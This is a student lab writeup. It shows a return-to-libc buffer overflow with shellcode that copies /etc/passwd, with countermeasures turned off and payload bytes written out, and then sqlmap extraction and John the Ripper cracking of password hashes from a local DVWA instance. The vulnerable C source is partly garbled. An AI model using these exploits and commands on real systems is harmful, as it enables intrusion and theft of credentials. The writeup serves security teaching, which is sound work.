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Lab #1,22110031, Bien Xuan Huy, INSE330380E_01FIE

Task 1: Software buffer overflow attack

Given a vulnerable C program

#include <stdio.h>
#include <string.h>
void redundant_code(char* p)
    char local[256];
	printf("redundant code\n");
int main(int argc, char* argv[])
	char buffer[16];
	return 0;

and a shellcode source in asm. This shellcode copy /etc/passwd to /tmp/pwfile

global _start
section .text
    xor eax,eax
    mov al,0x5
    xor ecx,ecx
    push ecx
    push 0x64777373 
    push 0x61702f63
    push 0x74652f2f
    lea ebx,[esp +1]
    int 0x80

    mov ebx,eax
    mov al,0x3
    mov edi,esp
    mov ecx,edi
    push WORD 0xffff
    pop edx
    int 0x80
    mov esi,eax

    push 0x5
    pop eax
    xor ecx,ecx
    push ecx
    push 0x656c6966
    push 0x74756f2f
    push 0x706d742f
    mov ebx,esp
    mov cl,0102o
    push WORD 0644o
    pop edx
    int 0x80

    mov ebx,eax
    push 0x4
    pop eax
    mov ecx,edi
    mov edx,esi
    int 0x80

    xor eax,eax
    xor ebx,ebx
    mov al,0x1
    mov bl,0x5
    int 0x80

Question 1:

  • Compile asm program and C program to executable code.
  • Conduct the attack so that when C program is executed, the /etc/passwd file is copied to /tmp/pwfile. You are free to choose Code Injection or Environment Variable approach to do.
  • Write step-by-step explanation and clearly comment on instructions and screenshots that you have made to successfully accomplished the attack. Answer 1:

1. Preparation

I saved the vulnerable C program in a file named env.c and shellcode in task1.asm. In order to attack, I will first convert the task1.asm into machine code using the following commands.

nasm -g -f elf task1.asm
ld -m elf_i386 -o task1 task1.o

My idea is I will use system() to execute shellcode in task1, which generated above. In order to to that, I need to overflow the buffer memory to higher addresses, which will redirect my program flow to execute shellcode in task1 as expected.

Consider the stack frame of the main function of env.c.


I will replace data in return address with the address of system(), set argc to the address of exit(). Since task1 is placed on disk so in order to run it I will saved its path in an environment variable named VULNP, then place address of that variable in argv. This way, when the program returns, it will run system() as the return address is popped off the stack.

I replace exit() in argc since stack will consider argc as return address of system() when I redirect program flow to system(). Additionally, argv will be considered as argument of system(), which will be the path of the executable program.

Command to create environment variable:

export VULN=/home/seed/seclabs/bof/task1

2. Build the attack

Now I need to find three things: address of system(), address of exit(), address of VULNP. Here're the steps:

1. Compile env.c and turn off countermeasure factors in OS

Compiling env.c with some options such as disabling the stack protector and allowing execution on stack:

gcc -g env.c -o env.out -fno-stack-protector -mpreferred-stack-boundary=2 -z execstack

Creat link to zsh instead of default dash to turn off bash countermeasures of Ubuntu 16.04:

sudo ln -sf /bin/zsh /bin/sh

Turn off OS's address space layout randomization

sudo sysctl -w kernel.randomize_va_space=0

2. Load program into gdb and find necessary addresses

Run the env.out

gdb -q env.out

Then, run these two following commands to find addresses of system() and exit():

p system
p exit

Also run this command to get address of VULNP variable:

print getenv("VULNP")

Here's the result:


Observing the results:

  • Address of system(): 0xf7e50db0
  • Address of exit(): 0xf7e449e0
  • Address of VULNP: 0xffffdf04x

3. Conduct the attack

Note that we need to overflow the addresses in little-endian format. The most important thing is that we can only run this command while loading the program in gdb, as the address of VULNP will be different outside of it.

Here’s the attack command:

run $(python -c "print('a' * 20 + '\xb0\x0d\xe5\xf7' + '\xe0\x49\xe4\xf7' + '\x04\xdf\xff\xff')")

The first 20 bytes will overflow the buffer memory and the ebp, followed by the addresses we expect.

After running command, here's the result:


As we can clearly see, a file named outfile is created in /tmp/ as expected.

Inspect outfile using this command (when still in the /tmp/ folder):

cat outfile



Check content in /etc/passwd:


cat /etc/passwd



The content of /etc/passwd matches the content in /tmp/outfile.

Conclusion: Task successfully.

Task 2: Attack on database of DVWA

  • Install dvwa (on host machine or docker container)
  • Make sure you can login with default user
  • Install sqlmap
  • Write instructions and screenshots in the answer sections. Strictly follow the below structure for your writeup.

Question 1: Use sqlmap to get information about all available databases Answer 1:

1. Preparation.

After getting into SQL Injection option of DVWA, which we will use sqlmap on, we need to retrieve some needed informations first.

First, we need the URL. I will submit first request with id=1 to form a complete URL which sent back to server. And here's what we have: "http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit#".

It also reveals that current page is using GET method.

Second, we need PHPSESSID as it keeps connection between us and server. Without PHPSESSID, sqlmap can't access into server.

Following these steps: Inspect web page --> Move to Application tab. PHPSESSID is shown.


2. Form command.

Here's the command I will use:

sqlmap -u "http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=23tquf80cnqkgtfqutueprkto4" --dbs --batch

Explain options:

  • -u: Indicates target URL.
  • --cookie: Provides session information to keep maintaining connection when attacking.
  • --dbs: Reveals only databases information on the target server.
  • --batch: Skips redundant prompts in my labs.

After running the command, here's the result:


First info is about back-end technologies:

  • web server operating system: Linux Debian 9 (stretch)
  • web application technology: Apache 2.4.25
  • back-end DBMS: MySQL >= 5.0 (MariaDB fork)

This information is very helpful as each version or each technology type has different security techniques.

Second info is about databases we we need:

  • dvwa
  • information_schema

Question 2: Use sqlmap to get tables, users information Answer 2:

1. Get tables of database.

In previous question, we know that DVWA has 2 databases: dvwa and information_schema

dvwa is the provided database for user like us to inspect the vulnerabilities, so in this question I will inspect its tables.

Here's the commamd:

sqlmap -u "http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=23tquf80cnqkgtfqutueprkto4" --batch -D dvwa --tables

Explain options:

  • -D dvwa: Indicates target database.
  • --tables: Reveals tables of target database.

Here's the result:


Database dvwa has 2 tables:

  • guestbook
  • users

2. Get information of users table.

As we acknowledged in previous sub-task, dvwa has a users table which likely contains information about users.

To get data of that table, here's the command I use:

sqlmap -u "http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=23tquf80cnqkgtfqutueprkto4" --batch -D dvwa -T users --dump

Explain options:

  • -D dvwa -T users: Indicates target table of specific database. In this case, it refers to the users table of dvwa.
  • --dump: Extracts information of indicated table.

Here's the result:


Question 3: Make use of John the Ripper to disclose the password of all database users from the above exploit Answer 3:

In question 2 above, when sqlmap extracts information from users table, including hashed password field, it also decrypts the password. We can see the decrypted values are placed in parentheses.

I will still re-decrypt the those hashed passwords again in order to verify results of sqlmap, also learn how to use John the Ripper

After installing John the Ripper version 1.9.0-jumbo-1 64-bit Windows, I open cmd in folder /downloadedJohnFile/run/ and run this command:

john --show --format=Raw-MD5 C:\Users\Xuanh\Desktop\hash.txt

Explain options:

  • --show: Shows result after decryption.
  • --format=Raw-MD5: Specifies what hashing type is used.
  • Follows by text file contains hashed codes, listed line by line.

In hash.txt file, I stored values in order of users table, so the expected result should be:

  • password
  • abc123
  • charley
  • letmein
  • password

Here's the result after run above command:


As we can see decrypted passwords match.